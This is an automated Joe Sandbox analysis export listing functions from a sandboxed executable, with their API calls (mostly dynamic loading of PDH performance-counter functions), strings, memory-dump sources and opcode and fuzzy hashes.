Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: OpenService$CloseHandleManagerVersion
String ID: RasMan$kE
API String ID: 2151262118-4046792064
Opcode ID: c33881a0806769f20938f80c0c04eec70c2d5c6c45a48c80762b9241ce2e5684
Instruction ID: 2346b9b0a0f00ad55138da1f58a4506fa34ce3a666c5abcaa8120da2765b52af
Opcode Fuzzy Hash: c33881a0806769f20938f80c0c04eec70c2d5c6c45a48c80762b9241ce2e5684
Instruction Fuzzy Hash: F82128B1900B009BC3208F2AD944B5AFBF9FF94714F50892FE546C76A1D3B89441CF45

Function 004123CF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0041240D
GetSystemMetrics.USER32(00000000), ref: 00412425
GetSystemMetrics.USER32(00000001), ref: 0041242C
lstrcpyA.KERNEL32(?,DISPLAY), ref: 00412450

Strings

DISPLAY, xrefs: 0041244A
B, xrefs: 004123EE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: 437fda2651f1fca1401c3fa28d00fc553190aa960f0b5175fdd22b9da506966f
Instruction ID: e4f3403c9c9c6ac3e3cf53de9be8d233b6d42e42cdf7965f69be86168804fad6
Opcode Fuzzy Hash: 437fda2651f1fca1401c3fa28d00fc553190aa960f0b5175fdd22b9da506966f
Instruction Fuzzy Hash: 2811C171600325ABCB119F24DE806DB7BA8EF05751B008062FC08DA102D2F5D491CBA9

Function 00429DE0 Relevance: 10.5, APIs: 7, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00429DED
GetWindowRect.USER32(?,?), ref: 00429DFB
InflateRect.USER32(?,00000001,00000001), ref: 00429E0A
GetParent.USER32(?), ref: 00429E11
ScreenToClient.USER32(00000000,?), ref: 00429E25
ScreenToClient.USER32(00000000,?), ref: 00429E2D
ValidateRect.USER32(00000000,?), ref: 00429E41

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateLongParentValidate
String ID:
API String ID: 2275295265-0
Opcode ID: a174e7dac3a56443e16f8b5f86980b5da61d84e022c76dada76f81a613ddf084
Instruction ID: fb27b6d94f48dd974f18d6c92881fa8511a835ac840dac2ba19b04d241cb836e
Opcode Fuzzy Hash: a174e7dac3a56443e16f8b5f86980b5da61d84e022c76dada76f81a613ddf084
Instruction Fuzzy Hash: 2CF08C32004705BFD311AB54DCD8EBF77BCEB89722F404529F91992192E734E8068B66

Function 0040EBC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EBD5
GetLastError.KERNEL32 ref: 0040EBE4
GetProcAddress.KERNEL32(00000000,PdhComputeCounterStatistics), ref: 0040EBFA
GetLastError.KERNEL32 ref: 0040EC09

Strings

PDH.DLL, xrefs: 0040EBD0
PdhComputeCounterStatistics, xrefs: 0040EBF4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhComputeCounterStatistics
API String ID: 1866314245-1676478568
Opcode ID: 7578870f8250b5b4092b5c0b92ae6caf777e1cf647c8830d3b589fd470c3e337
Instruction ID: 3ece3d412b463615b1a26a445762ae0e78485d14ca48a7b5c657a9a26f149dfa
Opcode Fuzzy Hash: 7578870f8250b5b4092b5c0b92ae6caf777e1cf647c8830d3b589fd470c3e337
Instruction Fuzzy Hash: F3014FB16042016BD600EF66DC44D577BE9AB94784B40893EF409D3262E774E896CFAA

Function 0040EDB0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EDC5
GetLastError.KERNEL32 ref: 0040EDD4
GetProcAddress.KERNEL32(00000000,PdhEnumObjectsA), ref: 0040EDEA
GetLastError.KERNEL32 ref: 0040EDF9

Strings

PdhEnumObjectsA, xrefs: 0040EDE4
PDH.DLL, xrefs: 0040EDC0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhEnumObjectsA
API String ID: 1866314245-135898359
Opcode ID: 0e8c838f7cb03e7a3c327132e2827443447076bb887e916e88710c82165be748
Instruction ID: c4a42d863a96bc46129255ff1018d04456cb0ab53eb59e647a6876cf3fb29577
Opcode Fuzzy Hash: 0e8c838f7cb03e7a3c327132e2827443447076bb887e916e88710c82165be748
Instruction Fuzzy Hash: 0001F4B16042016BC600EF66DC44D5B7BE9EF98744700892EF405D3262E774D855CFDA

Function 0040F280 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F295
GetLastError.KERNEL32 ref: 0040F2A4
GetProcAddress.KERNEL32(00000000,PdhParseInstanceNameA), ref: 0040F2BA
GetLastError.KERNEL32 ref: 0040F2C9

Strings

PDH.DLL, xrefs: 0040F290
PdhParseInstanceNameA, xrefs: 0040F2B4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhParseInstanceNameA
API String ID: 1866314245-2967807406
Opcode ID: 1838fa0f8191a4e068914554fa5dd1d503d693329b649d3e42264b29b7360933
Instruction ID: 52e3e9c56ba620e9f90a47ba40bb96792fd159db73fe61a0877075bd66b7a818
Opcode Fuzzy Hash: 1838fa0f8191a4e068914554fa5dd1d503d693329b649d3e42264b29b7360933
Instruction Fuzzy Hash: DB0167B16142016FC610EF65DC44D577BE8AF94744700893EF805D3262E774D855CF9A

Function 0040EEA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EEB5
GetLastError.KERNEL32 ref: 0040EEC4
GetProcAddress.KERNEL32(00000000,PdhGetCounterInfoA), ref: 0040EEDA
GetLastError.KERNEL32 ref: 0040EEE9

Strings

PDH.DLL, xrefs: 0040EEB0
PdhGetCounterInfoA, xrefs: 0040EED4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhGetCounterInfoA
API String ID: 1866314245-2371631894
Opcode ID: fd985299b3f26cef61e7a627586f6844003370e82716dbe55fdc8b56c674e427
Instruction ID: d0b4a0d068a17a8ffaf53404d4ae25cfc802e1f0bbf3b65cceaaf45eddec55a4
Opcode Fuzzy Hash: fd985299b3f26cef61e7a627586f6844003370e82716dbe55fdc8b56c674e427
Instruction Fuzzy Hash: EAF044B16043056BC700EF66EC449273BECAB847447448C3EF409D3251E7B4E815CBAB

Function 0040EFA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EFB5
GetLastError.KERNEL32 ref: 0040EFC4
GetProcAddress.KERNEL32(00000000,PdhGetDefaultPerfObjectA), ref: 0040EFDA
GetLastError.KERNEL32 ref: 0040EFE9

Strings

PDH.DLL, xrefs: 0040EFB0
PdhGetDefaultPerfObjectA, xrefs: 0040EFD4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhGetDefaultPerfObjectA
API String ID: 1866314245-1846554490
Opcode ID: 660a7c87bc5ceae689ad7209afa50e761425dab82bd2353bc57cfe5253b26ff2
Instruction ID: f9f5271926955cdf1a921e475da66593e59811543778ce6cbd9a82872be3c7df
Opcode Fuzzy Hash: 660a7c87bc5ceae689ad7209afa50e761425dab82bd2353bc57cfe5253b26ff2
Instruction Fuzzy Hash: D6F0ECB16043116BD700EFA6EC459273BE9AB847487448D3EF809E3251E7B4E8558FAB

Function 0040F110 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F125
GetLastError.KERNEL32 ref: 0040F134
GetProcAddress.KERNEL32(00000000,PdhMakeCounterPathA), ref: 0040F14A
GetLastError.KERNEL32 ref: 0040F159

Strings

PdhMakeCounterPathA, xrefs: 0040F144
PDH.DLL, xrefs: 0040F120

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhMakeCounterPathA
API String ID: 1866314245-1712751973
Opcode ID: 8f45c926cecbcfa30e28ade428f31be0bd20ee17bf28495bf1d0b96afe702b6a
Instruction ID: 93e413fde13e5f3fc30cd6776b78374bdde5e99920d5354d095a0b6da59524f4
Opcode Fuzzy Hash: 8f45c926cecbcfa30e28ade428f31be0bd20ee17bf28495bf1d0b96afe702b6a
Instruction Fuzzy Hash: 77F044B1600301ABC710EF75EC459273BE8EB84744744883EF809D3251E7B4EC55CBAA

Function 0040F200 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F215
GetLastError.KERNEL32 ref: 0040F224
GetProcAddress.KERNEL32(00000000,PdhParseCounterPathA), ref: 0040F23A
GetLastError.KERNEL32 ref: 0040F249

Strings

PDH.DLL, xrefs: 0040F210
PdhParseCounterPathA, xrefs: 0040F234

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhParseCounterPathA
API String ID: 1866314245-289484814
Opcode ID: 580d395185b143b7e5c6ad6b6a00d598f073bc33e28dd269bc1cd6ee40ac104c
Instruction ID: f26488d467c12521dd9639f35acb76d22bf5e0997741594fee790cbc568f8cb1
Opcode Fuzzy Hash: 580d395185b143b7e5c6ad6b6a00d598f073bc33e28dd269bc1cd6ee40ac104c
Instruction Fuzzy Hash: 3AF0E1B1604301ABD610EF65EC459173BE8AB84744744897EF805D3251E7B4E855CBAA

Function 0040F025 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F035
GetLastError.KERNEL32 ref: 0040F044
GetProcAddress.KERNEL32(?,PdhGetFormattedCounterValue), ref: 0040F05A
GetLastError.KERNEL32(?,PdhGetFormattedCounterValue), ref: 0040F069

Strings

PDH.DLL, xrefs: 0040F030
PdhGetFormattedCounterValue, xrefs: 0040F054

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhGetFormattedCounterValue
API String ID: 1866314245-116502587
Opcode ID: 577ae3a2b496421663e7666c1b8edfc815bb219878de34ce7e27c36fc1731221
Instruction ID: 7bb672dabfe0c8fadd43653b8679be75e7a8d254872074fdeaa995583cbb7342
Opcode Fuzzy Hash: 577ae3a2b496421663e7666c1b8edfc815bb219878de34ce7e27c36fc1731221
Instruction Fuzzy Hash: A1F062B1A003016BD710EF75EC45D673BE8AF84744704893EF909E3251E7B4E818CBAA

Function 0040ECB0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040ECC5
GetLastError.KERNEL32 ref: 0040ECD4
GetProcAddress.KERNEL32(00000000,PdhEnumMachinesA), ref: 0040ECEA
GetLastError.KERNEL32 ref: 0040ECF9

Strings

PDH.DLL, xrefs: 0040ECC0
PdhEnumMachinesA, xrefs: 0040ECE4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhEnumMachinesA
API String ID: 1866314245-4189633809
Opcode ID: 313746128f0d3ad16eff169fbe11ad906c217ca074a8329a4c26692ea3793349
Instruction ID: c6ddfe434ef787303ea080a57cffaf46225cd0ad03eea656512db9050bb5b236
Opcode Fuzzy Hash: 313746128f0d3ad16eff169fbe11ad906c217ca074a8329a4c26692ea3793349
Instruction Fuzzy Hash: 55F012B16043006FD610EF76EC4491B3BA8EB84758744893EF809D3251E774D815CB9B

Function 0040F0A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F0B5
GetLastError.KERNEL32 ref: 0040F0C4
GetProcAddress.KERNEL32(00000000,PdhGetRawCounterValue), ref: 0040F0DA
GetLastError.KERNEL32 ref: 0040F0E9

Strings

PDH.DLL, xrefs: 0040F0B0
PdhGetRawCounterValue, xrefs: 0040F0D4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhGetRawCounterValue
API String ID: 1866314245-790557936
Opcode ID: ff26d2067f5bb15071ed6adcf3c101489b6f82bc1503b2ea7f29f405c78faf58
Instruction ID: a5b3a2bfad81d6497df4ef7ef9bf2fd16b1d512d6718910de66016a83a034edc
Opcode Fuzzy Hash: ff26d2067f5bb15071ed6adcf3c101489b6f82bc1503b2ea7f29f405c78faf58
Instruction Fuzzy Hash: FFF012B16003006BD620EF75EC459173BA8AB84758744883EF909D3651E7B4D855CB9A

Function 0040F195 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F1A5
GetLastError.KERNEL32 ref: 0040F1B4
GetProcAddress.KERNEL32(?,PdhOpenQuery), ref: 0040F1CA
GetLastError.KERNEL32(?,PdhOpenQuery), ref: 0040F1D9

Strings

PDH.DLL, xrefs: 0040F1A0
PdhOpenQuery, xrefs: 0040F1C4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhOpenQuery
API String ID: 1866314245-2852752577
Opcode ID: b07a7d4c8228872d43ed2f983276c11e075b2c891db40716d77c2a9876c36450
Instruction ID: 500e75a8351ed302d623022f065ac2123e985f2aa988efb75b491d049d4f99ec
Opcode Fuzzy Hash: b07a7d4c8228872d43ed2f983276c11e075b2c891db40716d77c2a9876c36450
Instruction Fuzzy Hash: F6F030B1A14310ABD610EFB6EC15A2B3BA8AB44754740C83EF809D3251FB74D814CFAE

Function 0040F370 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F385
GetLastError.KERNEL32 ref: 0040F394
GetProcAddress.KERNEL32(00000000,PdhSetCounterScaleFactor), ref: 0040F3AA
GetLastError.KERNEL32 ref: 0040F3B9

Strings

PDH.DLL, xrefs: 0040F380
PdhSetCounterScaleFactor, xrefs: 0040F3A4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhSetCounterScaleFactor
API String ID: 1866314245-2960838627
Opcode ID: 31724d2db32a9a9f36aba5fe20dce34c31c9823f6c84c86199f91de41b543e9c
Instruction ID: eb8fce0b4fcc668a1be1f8f57977b8b8c6841ce3a6cfa5b7a526f1e83fe65736
Opcode Fuzzy Hash: 31724d2db32a9a9f36aba5fe20dce34c31c9823f6c84c86199f91de41b543e9c
Instruction Fuzzy Hash: CFF030B1A00200AFD610EB76EC459573BACEF40758740C83AFC09D3261F7B8D8558F9A

Function 0040E9F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EA05
GetLastError.KERNEL32 ref: 0040EA14
GetProcAddress.KERNEL32(00000000,PdhBrowseCountersA), ref: 0040EA2A
GetLastError.KERNEL32 ref: 0040EA39

Strings

PDH.DLL, xrefs: 0040EA00
PdhBrowseCountersA, xrefs: 0040EA24

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhBrowseCountersA
API String ID: 1866314245-1212836791
Opcode ID: 3a41a50d11526ff6611c30852aeb3163df17693a18a2c91d244f0c69673685fc
Instruction ID: 1de1a5b203ec807ed440fc8faced6e4e24238e55a0a38f95817f056ca7fe4759
Opcode Fuzzy Hash: 3a41a50d11526ff6611c30852aeb3163df17693a18a2c91d244f0c69673685fc
Instruction Fuzzy Hash: 67F054B1B102006BC610EB76AC059573BE8AA44748340883EF809E3252F7B4D8608F9F

Function 0040F3E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F3F5
GetLastError.KERNEL32 ref: 0040F404
GetProcAddress.KERNEL32(00000000,PdhValidatePathA), ref: 0040F41A
GetLastError.KERNEL32 ref: 0040F429

Strings

PDH.DLL, xrefs: 0040F3F0
PdhValidatePathA, xrefs: 0040F414

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
